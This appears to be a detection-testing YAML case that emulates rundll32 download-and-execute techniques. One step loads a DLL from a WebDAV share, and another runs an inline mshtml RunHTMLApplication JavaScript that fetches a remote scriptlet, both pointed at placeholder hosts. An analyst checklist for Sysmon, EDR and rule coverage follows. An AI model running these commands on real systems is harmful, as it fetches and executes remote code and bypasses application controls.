id: DLEXEC_007_rundll32_remote
name: "Download and Execute — Rundll32 WebDAV DLL and JavaScript"
mitre: "T1218.011, T1105"
category: download_execute
description: >
  Executes a remote DLL from a WebDAV share via rundll32.exe, and also tests the
  JavaScript execution method via mshtml RunHTMLApplication. Rundll32 is a signed
  Windows binary that can load and execute arbitrary DLL exports and inline scripts.
  Replace all PLACEHOLDER values.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-007] Rundll32 method 1 — remote DLL from WebDAV"

  - type: exec
    binary: rundll32.exe
    args: \\PLACEHOLDER_WEBDAV_HOST\PLACEHOLDER_FOLDER\payload.dll,PLACEHOLDER_ENTRYPOINT
    timeout_seconds: 30

  - type: sleep
    seconds: 30

  - type: marker
    message: "[DLEXEC-007] Rundll32 method 2 — JavaScript via mshtml RunHTMLApplication"

  - type: exec
    binary: rundll32.exe
    args: 'javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:PLACEHOLDER_HTTP_URL/payload.sct");window.close();'
    timeout_seconds: 30

  - type: sleep
    seconds: 30

analyst_checklist:
  - "Sysmon Event ID 1: rundll32.exe with UNC path and entrypoint captured?"
  - "Sysmon Event ID 1: rundll32.exe with javascript: inline argument captured?"
  - "Sysmon Event ID 3: Network connection from rundll32.exe to remote host?"
  - "Sysmon Event ID 7: DLL loaded from network path — module load event present?"
  - "EDR: Alert on rundll32.exe loading DLL from UNC/WebDAV path?"
  - "EDR: Method 2 javascript: inline execution caught — this often bypasses signature EDRs."
  - "EDR: rundll32.exe child processes captured?"
  - "SIEM: rundll32.exe network connection events present?"
  - "Rule opportunity: rundll32.exe with UNC path (\\\\) in commandline"
  - "Rule opportunity (critical): rundll32.exe commandline containing 'javascript:' or 'mshtml'"
  - "Gap check: Method 2 (JavaScript) is a well-known AppLocker bypass — test if your EDR catches it."
